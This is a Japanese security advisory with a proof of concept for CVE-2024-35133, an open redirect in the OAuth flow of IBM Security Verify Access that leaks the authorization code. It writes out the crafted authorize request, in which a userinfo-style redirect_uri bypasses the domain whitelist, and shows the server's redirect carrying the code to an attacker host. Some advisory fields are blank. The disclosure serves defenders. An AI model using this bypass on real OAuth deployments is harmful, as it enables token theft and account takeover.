
CVE-2024-35133 のセキュリティ速報 - PoC 付き
改訂: 1.0
影響:
リモートの攻撃者は、被害者に特別に細工されたウェブサイトへのアクセスを誘導することで、この脆弱性を悪用して表示されるURLを偽装し、ユーザーを悪意のあるウェブサイトにリダイレクトさせる可能性があります。これにより、攻撃者は機密性の高い情報を取得したり、被害者に対してさらなる攻撃を仕掛けることが可能になります。
深刻度:
CVSS スコア:
CVE-ID: CVE-2024-35133
ベンダー: IBM
影響を受ける製品:
影響を受けるバージョン: 10.0.0 - 10.0.8
IBM Security Verify Access は、完全な認可およびネットワークセキュリティポリシー管理ソリューションです。地理的に分散したイントラネットおよびエクストラネット上のリソースをエンドツーエンドで保護します。
主な機能は次のとおりです。
クライアントの OAuth フローのペネトレーションテスト中に、OAuth の「code」変数の漏洩を許すオープンリダイレクト脆弱性が発見されました。
OAuth フロー中の「redirect_uri」パラメータを検証するパーサーのロジックを(RFC 3986 を利用して)バイパスすることで、攻撃者は IBM Security Verify Access のドメインホワイトリストフィルタを操作できました。その結果、攻撃者が制御する任意のドメインへのオープンリダイレクトが発生しました。被害者は、ドメインが信頼されているように見える状態で悪意のあるサイトにリダイレクトされる可能性があります。
これにより、OAuth の「code」トークンなどの機密情報が露呈したり、被害者に対するさらなる攻撃が発生する可能性があります。
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
HTTP/1.1 302 Found
content-language: en-US
date: Tue, 19 Mar 2024 16:04:35 GMT
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-frame-options: DENY
x-content-type-options: nosniff
cache-control: no-store
x-xss-protection: 1; mode=block
x-permitted-cross-domain-policies: none
cross-origin-resource-policy: same-site
content-security-policy: frame-ancestors 'none'
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=31536000; includeSubDomains
pragma: no-cache
Content-Length: 0.
パッチ、アップグレード、または推奨される回避策については、IBM セキュリティ速報 7166712 を参照してください。
詳細は 参考情報 を参照してください。
本脆弱性は以下の方により発見・報告されました。
Copyright (c) 2024 Giulio Garzia "Ozozuz"
このアラートの電子的な再配布は許可されています。明示的な書面による同意なしに編集することはできません。他のメディアでこのアラートを転載する場合は、著者に連絡してください。
免責事項: 本アドバイザリの情報は、公開時点で利用可能なデータに基づいて正確です。いかなる保証も提供されません。著者も発行者も、本情報の使用に起因する直接的、間接的、または結果的な損害について責任を負いません。